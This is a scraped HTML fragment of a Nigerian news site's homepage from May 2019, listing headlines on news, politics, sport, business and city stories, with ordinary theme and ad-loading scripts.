class="category-news">News</a></span> </div> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/social-media-addicts-susceptible-to-mental-health-challenges/">&#8216;Social media addicts susceptible to mental health challenges&#8217;</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/social-media-addicts-susceptible-to-mental-health-challenges/"><i class="fa fa-clock-o"></i> May 16, 2019</a></div></div> </div> </article><article class="jeg_post jeg_pl_md_5 post-1041176 post type-post status-publish format-standard has-post-thumbnail hentry category-news category-news-update tag-ation-news tag-nigerian-newspapers tag-the-nation-newspaper"> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/eu-fines-5-banks-1-2bn-for-foreign-exchange-rigging/"><div class="thumbnail-container animate-lazy size-715 "><img width="350" height="250" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-350x250 size-jnews-350x250 lazyload wp-post-image" alt="EU fines 5 banks $1.2bn for foreign exchange rigging" data-src="https://thenationonlineng.net/wp-content/uploads/2019/05/eu-flag-350x250.jpg" data-sizes="auto" data-srcset="https://thenationonlineng.net/wp-content/uploads/2019/05/eu-flag-350x250.jpg 350w, https://thenationonlineng.net/wp-content/uploads/2019/05/eu-flag-120x86.jpg 120w" data-expand="700" /></div></a> <div class="jeg_post_category"> <span><a href="https://thenationonlineng.net/category/news/" class="category-news">News</a></span> </div> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/eu-fines-5-banks-1-2bn-for-foreign-exchange-rigging/">EU fines 5 banks $1.2bn for foreign exchange rigging</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/eu-fines-5-banks-1-2bn-for-foreign-exchange-rigging/"><i class="fa fa-clock-o"></i> May 16, 2019</a></div></div> </div> </article><article class="jeg_post jeg_pl_md_5 post-1041155 post type-post status-publish format-standard has-post-thumbnail hentry category-news category-news-update tag-bob-hawke-dies-at-89 tag-the-nation-newpaper tag-the-nation-news"> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/breaking-australias-former-pm-bob-hawke-dies-at-89/"><div class="thumbnail-container animate-lazy size-715 "><img width="350" height="250" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-350x250 size-jnews-350x250 lazyload wp-post-image" alt="Australia’s former PM, Bob Hawke" data-src="https://thenationonlineng.net/wp-content/uploads/2019/05/Australia’s-former-PM-Bob-Hawke-350x250.jpg" data-sizes="auto" data-srcset="https://thenationonlineng.net/wp-content/uploads/2019/05/Australia’s-former-PM-Bob-Hawke-350x250.jpg 350w, https://thenationonlineng.net/wp-content/uploads/2019/05/Australia’s-former-PM-Bob-Hawke-120x86.jpg 120w" data-expand="700" /></div></a> <div class="jeg_post_category"> <span><a href="https://thenationonlineng.net/category/news/" class="category-news">News</a></span> </div> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/breaking-australias-former-pm-bob-hawke-dies-at-89/">Breaking: Australia’s former PM, Bob Hawke dies at 89</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/breaking-australias-former-pm-bob-hawke-dies-at-89/"><i class="fa fa-clock-o"></i> May 16, 2019</a></div></div> </div> </article><article class="jeg_post jeg_pl_md_5 post-1040649 post type-post status-publish format-standard has-post-thumbnail hentry category-news category-online-special tag-larae-quy tag-mental-toughness"> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/five-ways-to-develop-mental-toughness/"><div class="thumbnail-container animate-lazy size-715 "><img width="350" height="250" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-350x250 size-jnews-350x250 lazyload wp-post-image" alt="GOOD MENTAL STATE OF MIND" data-src="https://thenationonlineng.net/wp-content/uploads/2019/05/119943857_t750x550-350x250.jpg" data-sizes="auto" data-srcset="https://thenationonlineng.net/wp-content/uploads/2019/05/119943857_t750x550-350x250.jpg 350w, https://thenationonlineng.net/wp-content/uploads/2019/05/119943857_t750x550-120x86.jpg 120w" data-expand="700" /></div></a> <div class="jeg_post_category"> <span><a href="https://thenationonlineng.net/category/news/" class="category-news">News</a></span> </div> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/five-ways-to-develop-mental-toughness/">Five ways to develop mental toughness</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/five-ways-to-develop-mental-toughness/"><i class="fa fa-clock-o"></i> May 16, 2019</a></div></div> </div> </article><article class="jeg_post jeg_pl_md_5 post-1041130 post type-post status-publish format-standard has-post-thumbnail hentry category-news category-news-update tag-nigeria-news tag-nigerian-newspapers tag-the-nation-newspaper"> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/hong-kong-activist-joshua-wong-returns-to-prison/"><div class="thumbnail-container animate-lazy size-715 "><img width="350" height="250" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-350x250 size-jnews-350x250 lazyload wp-post-image" alt="Hong Kong activist Joshua Wong" data-src="https://thenationonlineng.net/wp-content/uploads/2019/05/Joshua-350x250.jpg" data-sizes="auto" data-srcset="https://thenationonlineng.net/wp-content/uploads/2019/05/Joshua-350x250.jpg 350w, https://thenationonlineng.net/wp-content/uploads/2019/05/Joshua-120x86.jpg 120w" data-expand="700" /></div></a> <div class="jeg_post_category"> <span><a href="https://thenationonlineng.net/category/news/" class="category-news">News</a></span> </div> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/hong-kong-activist-joshua-wong-returns-to-prison/">Hong Kong activist Joshua Wong returns to prison</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/hong-kong-activist-joshua-wong-returns-to-prison/"><i class="fa fa-clock-o"></i> May 16, 2019</a></div></div> </div> </article><article class="jeg_post jeg_pl_md_5 post-1041101 post type-post status-publish format-standard has-post-thumbnail hentry category-news category-news-update tag-nigeria-news tag-nigeria-newspaper tag-the-nation-newspaper"> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/breaking-senate-confirms-emefiele-for-second-term/"><div class="thumbnail-container animate-lazy size-715 "><img width="350" height="250" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-350x250 size-jnews-350x250 lazyload wp-post-image" alt="The Central Bank of Nigeria (CBN) has dismissed claims that the CBN governor, Godwin Emefiele" data-src="https://thenationonlineng.net/wp-content/uploads/2019/03/godwin-emefiele-350x250.jpg" data-sizes="auto" data-srcset="https://thenationonlineng.net/wp-content/uploads/2019/03/godwin-emefiele-350x250.jpg 350w, https://thenationonlineng.net/wp-content/uploads/2019/03/godwin-emefiele-120x86.jpg 120w, https://thenationonlineng.net/wp-content/uploads/2019/03/godwin-emefiele-750x536.jpg 750w, https://thenationonlineng.net/wp-content/uploads/2019/03/godwin-emefiele-1140x815.jpg 1140w" data-expand="700" /></div></a> <div class="jeg_post_category"> <span><a href="https://thenationonlineng.net/category/news/" class="category-news">News</a></span> </div> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/breaking-senate-confirms-emefiele-for-second-term/">Breaking: Senate confirms Emefiele for second term</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/breaking-senate-confirms-emefiele-for-second-term/"><i class="fa fa-clock-o"></i> May 16, 2019</a></div></div> </div> </article> </div> </div> <div class='module-overlay'> <div class='preloader_type preloader_dot'> <div class="module-preloader jeg_preloader dot"> <span></span><span></span><span></span> </div> <div class="module-preloader jeg_preloader circle"> <div class="jnews_preloader_circle_outer"> <div class="jnews_preloader_circle_inner"></div> </div> </div> <div class="module-preloader jeg_preloader square"> <div class="jeg_square"><div class="jeg_square_inner"></div></div> </div> </div> </div> </div> <div class="jeg_block_navigation"> <div class='navigation_overlay'><div class='module-preloader jeg_preloader'><span></span><span></span><span></span></div></div> <div class="jeg_block_nav "> <a href="#" class="prev disabled" title="Previous"><i class="fa fa-angle-left"></i></a> <a href="#" class="next " title="Next"><i class="fa fa-angle-right"></i></a> </div> </div> <script>var jnews_module_915165_8_5cdd84c7c7a38 = {"header_icon":"","first_title":"News","second_title":"","url":"http:\/\/thenationonlineng.net\/category\/news\/","header_type":"heading_6","header_background":"","header_secondary_background":"","header_text_color":"","header_line_color":"","header_accent_color":"","header_filter_category":"","header_filter_author":"","header_filter_tag":"","header_filter_text":"All","post_type":"post","content_type":"all","number_post":"12","post_offset":"0","unique_content":"unique1","include_post":"","exclude_post":"","include_category":"3","exclude_category":"","include_author":"","include_tag":"","exclude_tag":"","sort_by":"latest","date_format":"custom","date_format_custom":"","pagination_mode":"nextprev","pagination_nextprev_showtext":"","pagination_number_post":"3","pagination_scroll_limit":0,"boxed":"","boxed_shadow":"","el_id":"","el_class":"","scheme":"","column_width":"auto","title_color":"","accent_color":"","alt_color":"","excerpt_color":"","css":".vc_custom_1554706607106{background-color: #ffffff !important;}","compatible_column_notice":"","paged":1,"column_class":"jeg_col_2o3","class":"jnews_block_22"};</script> </div></div></div></div></div><div class="row vc_row vc_inner vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="jeg_wrapper "><div class="wpb_wrapper"><div class='jeg_ad jeg_ad_module jnews_module_915165_9_5cdd84c93aad2 '><div class='ads-wrapper'><div class=''><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><br /> <br /> <ins class="adsbygoogle" style="display: block;" data-ad-client="ca-pub-5089981496810613" data-ad-slot="3919847066" data-ad-format="auto" data-full-width-responsive="true"></ins><br /> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></div></div></div></div></div></div></div><div class="row vc_row vc_inner vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-4"><div class="jeg_wrapper "><div class="wpb_wrapper"><div class="jeg_postblock_24 jeg_postblock jeg_module_hook jeg_pagination_disable jeg_col_1o3 jnews_module_915165_10_5cdd84c93ad5e " data-unique="jnews_module_915165_10_5cdd84c93ad5e"> <div class="jeg_block_heading jeg_block_heading_6 jeg_subcat_right"> <h3 class="jeg_block_title"><a href="https://thenationonlineng.net/category/politics/"><span>Politics</span></a></h3> </div> <div class="jeg_block_container"> <div class="jeg_posts"> <article class="jeg_post jeg_pl_md_box post-1041269 post type-post status-publish format-standard has-post-thumbnail hentry category-politics tag-godwin-obaseki tag-nigeria-news tag-nigerian-newspaper tag-the-nation-newspaper tag-yakubu-gowon"> <div class="box_wrap"> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/edo-2020-gowon-endorses-obaseki-for-second-term/"><div class="thumbnail-container animate-lazy size-715 "><img width="350" height="250" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-350x250 size-jnews-350x250 lazyload wp-post-image" alt="Edo 2020: Gowon endorses Obaseki for second term" data-src="https://thenationonlineng.net/wp-content/uploads/2019/05/Obaseki-and-Gowon-350x250.jpg" data-sizes="auto" data-srcset="https://thenationonlineng.net/wp-content/uploads/2019/05/Obaseki-and-Gowon-350x250.jpg 350w, https://thenationonlineng.net/wp-content/uploads/2019/05/Obaseki-and-Gowon-120x86.jpg 120w" data-expand="700" /></div></a> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/edo-2020-gowon-endorses-obaseki-for-second-term/">Edo 2020: Gowon endorses Obaseki for second term</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/edo-2020-gowon-endorses-obaseki-for-second-term/"><i class="fa fa-clock-o"></i> May 16, 2019</a></div></div> </div> </div> </article> <div class="jeg_postsmall jeg_load_more_flag"> <article class="jeg_post jeg_pl_xs_4 post-1041264 post type-post status-publish format-standard has-post-thumbnail hentry category-news-update category-politics tag-ike-ekweremadu tag-nigeria-news tag-nigerian-newspaper tag-the-nation-newspaper tag-the-nation-nigeria"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/constituents-to-ekweremadu-well-decide-when-you-should-retire-from-senate/">Constituents to Ekweremadu: We’ll decide when you should retire from Senate</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1041128 post type-post status-publish format-standard has-post-thumbnail hentry category-news-update category-politics tag-nigeria-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/ogun-i-didnt-collect-money-from-apc-to-abandon-my-case-at-tribunal/">Ogun: &#8216;I didn&#8217;t collect money from APC to abandon my case at Tribunal&#8217;</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1041086 post type-post status-publish format-standard has-post-thumbnail hentry category-news-update category-politics tag-nigerian-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/i-didnt-collect-money-from-apc-to-abandon-my-case-at-tribunal-pdp-senatorial-candidate/">I didn&#8217;t collect money from APC to abandon my case at the Tribunal &#8211; PDP Senatorial candidate</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1040894 post type-post status-publish format-standard has-post-thumbnail hentry category-politics tag-nigerian-news tag-nigerian-newspaper tag-the-nation-newspaper tag-west-central-challenge"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/kogi-poll-the-west-central-challenge/">Kogi poll: The West/Central challenge</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1040911 post type-post status-publish format-standard has-post-thumbnail hentry category-news category-politics tag-kogi-west tag-nigerian-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/kogi-west-adeyemi-battles-dino-over-over-voting-in-two-councils/">Kogi West: Adeyemi battles Dino over over-voting in two councils</a> </h3> </div> </article> </div> </div> <div class='module-overlay'> <div class='preloader_type preloader_dot'> <div class="module-preloader jeg_preloader dot"> <span></span><span></span><span></span> </div> <div class="module-preloader jeg_preloader circle"> <div class="jnews_preloader_circle_outer"> <div class="jnews_preloader_circle_inner"></div> </div> </div> <div class="module-preloader jeg_preloader square"> <div class="jeg_square"><div class="jeg_square_inner"></div></div> </div> </div> </div> </div> <div class="jeg_block_navigation"> <div class='navigation_overlay'><div class='module-preloader jeg_preloader'><span></span><span></span><span></span></div></div> </div> <script>var jnews_module_915165_10_5cdd84c93ad5e = {"header_icon":"","first_title":"Politics","second_title":"","url":"http:\/\/thenationonlineng.net\/category\/politics\/","header_type":"heading_6","header_background":"","header_secondary_background":"","header_text_color":"","header_line_color":"","header_accent_color":"","header_filter_category":"","header_filter_author":"","header_filter_tag":"","header_filter_text":"All","post_type":"post","content_type":"all","number_post":"6","post_offset":"0","unique_content":"disable","include_post":"","exclude_post":"","include_category":"6","exclude_category":"","include_author":"","include_tag":"","exclude_tag":"","sort_by":"latest","date_format":"custom","date_format_custom":"","pagination_mode":"disable","pagination_nextprev_showtext":"","pagination_number_post":4,"pagination_scroll_limit":0,"boxed":"","boxed_shadow":"","el_id":"","el_class":"","scheme":"","column_width":"auto","title_color":"","accent_color":"","alt_color":"","excerpt_color":"","css":"","compatible_column_notice":"","paged":1,"column_class":"jeg_col_1o3","class":"jnews_block_24"};</script> </div></div></div></div><div class="wpb_column vc_column_container vc_col-sm-4"><div class="jeg_wrapper "><div class="wpb_wrapper"><div class="jeg_postblock_24 jeg_postblock jeg_module_hook jeg_pagination_disable jeg_col_1o3 jnews_module_915165_11_5cdd84c94cf58 " data-unique="jnews_module_915165_11_5cdd84c94cf58"> <div class="jeg_block_heading jeg_block_heading_6 jeg_subcat_right"> <h3 class="jeg_block_title"><a href="https://thenationonlineng.net/category/sports2/sports-news/"><span>Sport</span></a></h3> </div> <div class="jeg_block_container"> <div class="jeg_posts"> <article class="jeg_post jeg_pl_md_box post-1040962 post type-post status-publish format-standard has-post-thumbnail hentry category-sports-news tag-nigerian-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="box_wrap"> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/chairman-christian-chukwu-arrives-in-london-tonight/"><div class="thumbnail-container animate-lazy size-715 "><img width="350" height="250" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-350x250 size-jnews-350x250 lazyload wp-post-image" alt="AILING Christian Chukwu" data-src="https://thenationonlineng.net/wp-content/uploads/2019/05/Chukwu-350x250.jpg" data-sizes="auto" data-srcset="https://thenationonlineng.net/wp-content/uploads/2019/05/Chukwu-350x250.jpg 350w, https://thenationonlineng.net/wp-content/uploads/2019/05/Chukwu-120x86.jpg 120w" data-expand="700" /></div></a> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/chairman-christian-chukwu-arrives-in-london-tonight/">&#8216;Chairman&#8217; Christian Chukwu arrives in London tonight</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/chairman-christian-chukwu-arrives-in-london-tonight/"><i class="fa fa-clock-o"></i> May 16, 2019</a></div></div> </div> </div> </article> <div class="jeg_postsmall jeg_load_more_flag"> <article class="jeg_post jeg_pl_xs_4 post-1040979 post type-post status-publish format-standard has-post-thumbnail hentry category-sports-news tag-nigerian-news tag-nigerian-newspaper tag-the-nation-newspaper tag-ufc-champion-adesanya"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/how-i-overcame-racist-abuse-as-a-teenager-by-ufc-champion-adesanya/">How I overcame racist abuse as a teenager, by UFC champion Adesanya</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1040975 post type-post status-publish format-standard has-post-thumbnail hentry category-sports-news tag-nigerian-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/el-hadji-diouf-seven-others-expected-today-for-the-match/">El Hadji Diouf, seven others expected today for ‘The Match’</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1040957 post type-post status-publish format-standard hentry category-sports-news tag-black-queens tag-wafu-cup"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/wafu-cup-22-goal-falcons-strike-fear-in-black-queens/">WAFU Cup: 22-goal Falcons strike fear in Black Queens</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1040977 post type-post status-publish format-standard has-post-thumbnail hentry category-sports-news tag-bolt-jumps tag-paris-scooter tag-sprint-superstar"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/sprint-superstar-bolt-jumps-into-paris-scooter-mania/">Sprint superstar Bolt jumps into Paris scooter mania</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1040971 post type-post status-publish format-standard hentry category-sports-news tag-amstel-malta tag-malt-drink tag-okpekpe"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/amstel-malta-is-okpekpe-races-official-malt-drink/">Amstel Malta is Okpekpe race&#8217;s official malt drink</a> </h3> </div> </article> </div> </div> <div class='module-overlay'> <div class='preloader_type preloader_dot'> <div class="module-preloader jeg_preloader dot"> <span></span><span></span><span></span> </div> <div class="module-preloader jeg_preloader circle"> <div class="jnews_preloader_circle_outer"> <div class="jnews_preloader_circle_inner"></div> </div> </div> <div class="module-preloader jeg_preloader square"> <div class="jeg_square"><div class="jeg_square_inner"></div></div> </div> </div> </div> </div> <div class="jeg_block_navigation"> <div class='navigation_overlay'><div class='module-preloader jeg_preloader'><span></span><span></span><span></span></div></div> </div> <script>var jnews_module_915165_11_5cdd84c94cf58 = {"header_icon":"","first_title":"Sport","second_title":"","url":"http:\/\/thenationonlineng.net\/category\/sports2\/sports-news\/","header_type":"heading_6","header_background":"","header_secondary_background":"","header_text_color":"","header_line_color":"","header_accent_color":"","header_filter_category":"","header_filter_author":"","header_filter_tag":"","header_filter_text":"All","post_type":"post","content_type":"all","number_post":"6","post_offset":"0","unique_content":"disable","include_post":"","exclude_post":"","include_category":"10","exclude_category":"","include_author":"","include_tag":"","exclude_tag":"","sort_by":"latest","date_format":"custom","date_format_custom":"","pagination_mode":"disable","pagination_nextprev_showtext":"","pagination_number_post":4,"pagination_scroll_limit":0,"boxed":"","boxed_shadow":"","el_id":"","el_class":"","scheme":"","column_width":"auto","title_color":"","accent_color":"","alt_color":"","excerpt_color":"","css":"","compatible_column_notice":"","paged":1,"column_class":"jeg_col_1o3","class":"jnews_block_24"};</script> </div></div></div></div><div class="wpb_column vc_column_container vc_col-sm-4"><div class="jeg_wrapper "><div class="wpb_wrapper"><div class="jeg_postblock_24 jeg_postblock jeg_module_hook jeg_pagination_disable jeg_col_1o3 jnews_module_915165_12_5cdd84c96dfff " data-unique="jnews_module_915165_12_5cdd84c96dfff"> <div class="jeg_block_heading jeg_block_heading_6 jeg_subcat_right"> <h3 class="jeg_block_title"><a href="https://thenationonlineng.net/category/business/"><span>Business</span></a></h3> </div> <div class="jeg_block_container"> <div class="jeg_posts"> <article class="jeg_post jeg_pl_md_box post-1041255 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-featured category-news-update tag-nigeria-news tag-nigerian-newspapers tag-the-nation-newspaper"> <div class="box_wrap"> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/breaking-mtn-nigeria-gains-n184b-in-listing-rally/"><div class="thumbnail-container animate-lazy size-715 "><img width="350" height="175" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-350x250 size-jnews-350x250 lazyload wp-post-image" alt="remittances, MTN, Court" data-src="https://thenationonlineng.net/wp-content/uploads/2018/10/mtn-1.jpg" data-sizes="auto" data-srcset="https://thenationonlineng.net/wp-content/uploads/2018/10/mtn-1.jpg 600w, https://thenationonlineng.net/wp-content/uploads/2018/10/mtn-1-300x150.jpg 300w" data-expand="700" /></div></a> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/breaking-mtn-nigeria-gains-n184b-in-listing-rally/">Breaking: MTN Nigeria gains N184b in listing rally</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/breaking-mtn-nigeria-gains-n184b-in-listing-rally/"><i class="fa fa-clock-o"></i> May 16, 2019</a></div></div> </div> </div> </article> <div class="jeg_postsmall jeg_load_more_flag"> <article class="jeg_post jeg_pl_xs_4 post-1041219 post type-post status-publish format-standard has-post-thumbnail hentry category-infotech tag-opera-limited"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/over-30million-users-to-enjoy-new-opera-ad/">Over 30million users to enjoy new opera ad</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1040746 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-featured category-news category-news-update tag-nigerian-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/equities-decline-with-n51b-loss/">Equities decline with N51b loss</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1040906 post type-post status-publish format-standard has-post-thumbnail hentry category-building-properties tag-nigerian-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/old-mutual-afreal-others-simplify-home-ownership/">Old Mutual, Afreal, others simplify home ownership</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1040841 post type-post status-publish format-standard has-post-thumbnail hentry category-business tag-jumia tag-new-york-exchange tag-nigerian-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/why-we-listed-in-new-york-exchange-by-jumia/">Why we listed in New York Exchange, by Jumia</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1040846 post type-post status-publish format-standard has-post-thumbnail hentry category-energy tag-nigerian-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/nigeria-others-to-account-for-53-of-fossil-fuel/">Nigeria, others to account for 53% of fossil fuel</a> </h3> </div> </article> </div> </div> <div class='module-overlay'> <div class='preloader_type preloader_dot'> <div class="module-preloader jeg_preloader dot"> <span></span><span></span><span></span> </div> <div class="module-preloader jeg_preloader circle"> <div class="jnews_preloader_circle_outer"> <div class="jnews_preloader_circle_inner"></div> </div> </div> <div class="module-preloader jeg_preloader square"> <div class="jeg_square"><div class="jeg_square_inner"></div></div> </div> </div> </div> </div> <div class="jeg_block_navigation"> <div class='navigation_overlay'><div class='module-preloader jeg_preloader'><span></span><span></span><span></span></div></div> </div> <script>var jnews_module_915165_12_5cdd84c96dfff = {"header_icon":"","first_title":"Business","second_title":"","url":"http:\/\/thenationonlineng.net\/category\/business\/","header_type":"heading_6","header_background":"","header_secondary_background":"","header_text_color":"","header_line_color":"","header_accent_color":"","header_filter_category":"","header_filter_author":"","header_filter_tag":"","header_filter_text":"All","post_type":"post","content_type":"all","number_post":"6","post_offset":"0","unique_content":"disable","include_post":"","exclude_post":"","include_category":"7","exclude_category":"","include_author":"","include_tag":"","exclude_tag":"","sort_by":"latest","date_format":"custom","date_format_custom":"","pagination_mode":"disable","pagination_nextprev_showtext":"","pagination_number_post":4,"pagination_scroll_limit":0,"boxed":"","boxed_shadow":"","el_id":"","el_class":"","scheme":"","column_width":"auto","title_color":"","accent_color":"","alt_color":"","excerpt_color":"","css":"","compatible_column_notice":"","paged":1,"column_class":"jeg_col_1o3","class":"jnews_block_24"};</script> </div></div></div></div></div><div class="row vc_row vc_inner vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-12 vc_hidden-sm vc_hidden-xs"><div class="jeg_wrapper "><div class="wpb_wrapper"><div class="jeg_postblock_22 jeg_postblock jeg_module_hook jeg_pagination_nextprev jeg_col_2o3 jnews_module_915165_13_5cdd84c99a62c vc_custom_1554706624525 " data-unique="jnews_module_915165_13_5cdd84c99a62c"> <div class="jeg_block_heading jeg_block_heading_6 jeg_subcat_right"> <h3 class="jeg_block_title"><a href="https://thenationonlineng.net/category/city-beats/"><span>City Beats</span></a></h3> </div> <div class="jeg_block_container"> <div class="jeg_posts_wrap"> <div class="jeg_posts jeg_load_more_flag"> <article class="jeg_post jeg_pl_md_5 post-1041265 post type-post status-publish format-standard has-post-thumbnail hentry category-city-beats category-news-update tag-nigeria-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/50-yr-old-woman-arrested-for-maid-trafficking/"><div class="thumbnail-container animate-lazy size-715 "><img width="350" height="250" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-350x250 size-jnews-350x250 lazyload wp-post-image" alt="50-yr-old woman arrested for maid trafficking" data-src="https://thenationonlineng.net/wp-content/uploads/2019/05/IMG-20190516-WA0005-350x250.jpg" data-sizes="auto" data-srcset="https://thenationonlineng.net/wp-content/uploads/2019/05/IMG-20190516-WA0005-350x250.jpg 350w, https://thenationonlineng.net/wp-content/uploads/2019/05/IMG-20190516-WA0005-120x86.jpg 120w" data-expand="700" /></div></a> <div class="jeg_post_category"> <span><a href="https://thenationonlineng.net/category/city-beats/" class="category-city-beats">City Beats</a></span> </div> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/50-yr-old-woman-arrested-for-maid-trafficking/">50-yr-old woman arrested for maid trafficking</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/50-yr-old-woman-arrested-for-maid-trafficking/"><i class="fa fa-clock-o"></i> May 16, 2019</a></div></div> </div> </article><article class="jeg_post jeg_pl_md_5 post-1041231 post type-post status-publish format-standard has-post-thumbnail hentry category-city-beats tag-cybercrime"> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/cybercrime-suspects-unleash-dog-on-efcc-operatives/"><div class="thumbnail-container animate-lazy size-715 "><img width="350" height="250" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-350x250 size-jnews-350x250 lazyload wp-post-image" alt="Cybercrime suspects in Ibadan unleashes dog on EFCC" data-src="https://thenationonlineng.net/wp-content/uploads/2019/05/Cybercrime-350x250.jpg" data-sizes="auto" data-srcset="https://thenationonlineng.net/wp-content/uploads/2019/05/Cybercrime-350x250.jpg 350w, https://thenationonlineng.net/wp-content/uploads/2019/05/Cybercrime-120x86.jpg 120w" data-expand="700" /></div></a> <div class="jeg_post_category"> <span><a href="https://thenationonlineng.net/category/city-beats/" class="category-city-beats">City Beats</a></span> </div> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/cybercrime-suspects-unleash-dog-on-efcc-operatives/">Cybercrime suspects unleash dog on EFCC operatives</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/cybercrime-suspects-unleash-dog-on-efcc-operatives/"><i class="fa fa-clock-o"></i> May 16, 2019</a></div></div> </div> </article><article class="jeg_post jeg_pl_md_5 post-1041145 post type-post status-publish format-standard has-post-thumbnail hentry category-city-beats tag-nigeria-news tag-nigerian-newspapers tag-the-nation-newspaper"> <div class="jeg_thumb"> <a 